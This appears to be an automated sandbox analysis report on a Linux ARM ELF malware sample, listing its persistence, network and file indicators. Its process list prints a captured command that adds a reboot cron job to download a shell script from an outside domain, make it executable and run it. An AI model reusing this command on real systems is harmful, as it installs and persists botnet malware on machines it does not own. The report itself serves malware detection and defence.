Analysis Overview
SHA256
d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125
Threat Level: Shows suspicious behavior
The file d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Modifies systemd
Changes its process name
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:55
Reported
2024-10-27 02:58
Platform
debian12-armhf-20240221-en
Max time kernel
136s
Max time network
175s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 194.36.144.87 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /var/spool/cron/crontabs/tmp.tEfHeO | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /lib/systemd/system/bot.service | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/mounts | /tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf | N/A |
Processes
/tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf
[/tmp/d105ded953a4f0bb32f38178fea5cb27ff01e1a3ec7958386fc973653bb3d125.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-6 | udp |
| DE | 194.36.144.87:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:13904 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.tEfHeO
| Hash | Value |
| --- | --- |
| MD5 | 0919d9b4cb8a0fbe406d94ca48080b1c |
| SHA1 | bfda5c0093cabd9b3fae9f38549e872ffbf1851a |
| SHA256 | 9846262d801c240c9e95e57945caeab9e2353b9d8f70b0a3726373406fa40fd5 |
| SHA512 | 349b045def88bebe1fae4ae8e6c2a9f5f57b4fb874ff7dd0a6e1c2b2e808c4ebfca819a5b4f7217aa97200cc5908bc158020d385f9f30edd9540803791a49ad9 |
/usr/lib/systemd/system/bot.service
| Hash | Value |
| --- | --- |
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |